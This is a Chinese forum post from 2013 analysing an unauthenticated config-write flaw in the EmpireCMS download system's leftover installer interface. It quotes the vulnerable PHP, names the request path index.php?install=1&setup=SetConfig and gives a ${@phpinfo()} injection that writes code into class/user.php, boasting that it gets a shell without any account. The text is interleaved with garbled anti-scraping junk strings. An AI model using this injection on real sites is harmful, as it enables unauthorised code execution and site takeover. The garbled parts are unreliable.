这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们8 `! J' i4 o2 j( ]. g4 P
) t& \5 G" Z7 B. @4 D' k3 Q9 g7 a. Z, g2 v/ V) K
这是帝国的一套下载系统 如图, r9 w/ p% ~5 [
ps(不需要任何账户和密码,直接写shell)
, m) U7 k) B2 e) d由于很多站是由于下载要整合discuz 等等一些论坛....
4 G6 h9 ~6 ?! n% j
/ ]: _- H3 S. {) [而帝国他又有一个万能接口,如图 3 z0 w4 o. h' g" m* a+ G8 i
l: p4 H1 S# C. z [
* e3 h/ T$ e/ J: |: ]. w
而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码
* O; }2 H1 {1 P4 ^5 r
" B& e5 z* y5 q2 y4 f当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪! p2 r' @. L( A" F/ Z$ y% [1 j
- k4 |7 V; P$ I8 h/ C在data/fun.php中的15行
: ?8 _& M5 b4 t8 a7 K
+ i0 Z, f. X* m& d" k, J我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {
& Y5 ]0 F' k' ?! q$ ~17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干
& Y, Q7 K% \2 ?. F7 j$ P9 h* r$ t6 @* j/ b3 t4 Z
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);2 l7 a6 f; A) t4 E4 N7 Z
( t+ X( F- [6 z! p3 z5 Y5 u
他将传进来的变量进行了切割,然后赋给了$filetext
* U1 ?# Z0 ^3 S5 [9 m" d
! C% I" N8 b* @, L) C4 N然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了( U0 Y8 l; H$ O
! E& F5 f( d2 H6 S; R
我们看看写入的结果,随便填一个
- z6 } f, g& v; e( L4 k
* w* y6 M; {2 ~ u( h) F2 K$ i- U0 @5 R
9 f1 D, ? J% P- H
T' l0 G3 h+ D: b. U
0 K4 c) y+ a- g- I8 M& @; \
% ?1 k. B% j8 O' z
& t/ o: c( I8 X) t' A- d3 {; C2 e5 U- p) z
3 P7 ]5 g& i2 O s
A! e/ }' M) T7 {
8 P* b1 }& y* N- Z' @
4 Y8 u3 O1 B$ K4 u
9 l" Z3 R* ~9 ~5 `6 n: t* x0 z: ]& F' n0 e( l4 F2 S8 g
m+ ~* |) j) J7 _4 E+ n
+ W5 ?1 M: p. ^+ K3 t% l, Z/ E
4 I" `, o( I8 P; @& ?' O5 v* V3 t% P2 B7 c. X" b* F' [) O
- K$ d* T/ ?3 i' N# L, U2 s& N
, D% h/ X, p4 L1 H1 _; n
, Q: z) |! M" S) p, a7 D所以我们淫荡点,写个${@phpinfo()}试试
( J& {5 ~" _$ E5 n" {; O然后访问以下class/user.php这个文件7 k3 c! E7 c5 Y' i; @
日了吧
% m" {& q7 U; M6 K& V4 e
+ p- k0 d$ X2 p/ z% C
; a s p d7 Z- O3 X5 w% _5 @8 h* l( H7 s' b4 j
& g# L6 E" d& J& g' M$ K+ d5 Z/ D# I
$ a$ M. S( X$ x( [ | 
发表于 2013-1-23 09:34:37
收藏
支持
反对